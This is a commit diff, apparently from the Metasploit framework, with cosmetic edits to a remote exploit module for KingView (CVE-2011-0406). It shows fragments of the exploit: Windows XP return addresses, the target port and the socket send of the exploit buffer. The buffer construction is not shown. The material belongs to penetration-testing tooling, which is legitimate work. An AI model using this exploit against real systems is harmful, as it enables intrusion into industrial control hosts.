Fix a few cosmetic issues with the kingview module
git-svn-id: file:///home/svn/framework3/trunk@11991 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
26bee16b5c
commit
f317d60e04
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2011-0406'],
|
||||
['OSVDB', '70366'],
|
||||
['Bugtraq', '45727'],
|
||||
['BUGTRAQ', '45727'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/15957'],
|
||||
['URL', 'http://www.kb.cert.org/vuls/id/180119'],
|
||||
['URL', 'http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html'],
|
||||
|
@ -49,10 +49,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
|
||||
[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
|
||||
[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ], #What return method is this?
|
||||
],
|
||||
'DisclosureDate' => "9/28/2010",
|
||||
'DefaultTarget' => 0))
|
||||
'DisclosureDate' => "Nov 28 2010"
|
||||
))
|
||||
|
||||
register_options( [ Opt::RPORT(777) ], self.class )
|
||||
end
|
||||
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
print_status("Trying target #{target.name}")
|
||||
sock.write(sploit)
|
||||
sock.put(sploit)
|
||||
|
||||
select(nil, nil, nil, 5)
|
||||
handler
|
||||
|
|
Loading…
Reference in New Issue